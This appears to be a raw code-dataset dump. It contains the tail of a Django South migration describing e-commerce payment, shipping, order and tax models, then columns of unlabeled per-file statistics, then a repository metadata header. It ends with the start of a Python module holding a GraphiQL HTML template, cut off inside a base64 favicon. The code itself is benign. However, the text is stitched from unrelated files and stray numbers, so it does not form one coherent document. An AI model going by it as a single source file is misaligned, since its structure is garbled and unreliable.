('django.db.models.fields.TextField', [], {'blank': 'True'}), 'number': ('django.db.models.fields.CharField', [], {'max_length': '30'}), 'pay_link': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'payment_method': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['payment.PaymentMethod']", 'null': 'True', 'blank': 'True'}), 'payment_price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'payment_tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'requested_delivery_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sa_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'order_shipping_address'", 'to': "orm['contenttypes.ContentType']"}), 'sa_object_id': ('django.db.models.fields.PositiveIntegerField', [], {}), 'session': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'shipping_method': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shipping.ShippingMethod']", 'null': 'True', 'blank': 'True'}), 'shipping_price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'shipping_tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'state': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}), 'state_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'uuid': ('django.db.models.fields.CharField', [], {'default': "'cb38c15b-66b9-48ad-bae2-1013ef3dd5e8'", 'unique': 'True', 'max_length': '50'}), 'voucher_number': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'voucher_price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'voucher_tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}) }, 'payment.paymentmethod': { 'Meta': {'ordering': "('priority',)", 'object_name': 'PaymentMethod'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'deletable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'module': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tax.Tax']", 'null': 'True', 'blank': 'True'}), 'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}) }, 'payment.paymentmethodprice': { 'Meta': {'ordering': "('priority',)", 'object_name': 'PaymentMethodPrice'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'payment_method': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'prices'", 'to': "orm['payment.PaymentMethod']"}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'payment.paypalordertransaction': { 'Meta': {'object_name': 'PayPalOrderTransaction'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'ipn': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['ipn.PayPalIPN']", 'symmetrical': 'False'}), 'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['order.Order']", 'unique': 'True'}) }, 'shipping.shippingmethod': { 'Meta': {'ordering': "('priority',)", 'object_name': 'ShippingMethod'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'delivery_time': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.DeliveryTime']", 'null': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'price_calculator': ('django.db.models.fields.CharField', [], {'default': "'lfs.shipping.GrossShippingMethodPriceCalculator'", 'max_length': '200'}), 'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tax.Tax']", 'null': 'True', 'blank': 'True'}) }, 'tax.tax': { 'Meta': {'object_name': 'Tax'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'rate': ('django.db.models.fields.FloatField', [], {'default': '0'}) } } complete_apps = ['payment']
90.311321
182
0.572966
3,000
28,719
5.357
0.092333
0.112999
0.196876
0.281252
0.812644
0.785701
0.759629
0.703565
0.632755
0.552735
0
0.016925
0.177095
28,719
318
183
90.311321
0.663098
0.012152
0
0.149153
0
0
0.579387
0.319946
0
0
0
0
0
1
0.00678
false
0.00678
0.013559
0
0.033898
0
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
cba74f9e105b75a00a08a2712a2cef3aad59c716
27,448
py
Python
frux_app_server/templates.py
camidvorkin/frux-app-server
21098234a7867908250022e3e1c0580417d1ca35
[ "Apache-2.0", "MIT" ]
3
2021-08-03T21:52:01.000Z
2021-09-14T19:39:10.000Z
frux_app_server/templates.py
camidvorkin/frux-app-server
21098234a7867908250022e3e1c0580417d1ca35
[ "Apache-2.0", "MIT" ]
null
null
null
frux_app_server/templates.py
camidvorkin/frux-app-server
21098234a7867908250022e3e1c0580417d1ca35
[ "Apache-2.0", "MIT" ]
null
null
null
"""Templates for pages.""" GRAPHIQL_TEMPLATE = """<!-- The request to this GraphQL server provided the header "Accept: text/html" and as a result has been presented GraphiQL - an in-browser IDE for exploring GraphQL. If you wish to receive JSON, provide the header "Accept: application/json" or add "&raw" to the end of the URL within a browser. --> <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>{{graphiql_html_title}}</title> <meta name="robots" content="noindex" /> <meta name="referrer" content="origin" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link href="data:image/x-icon;base64,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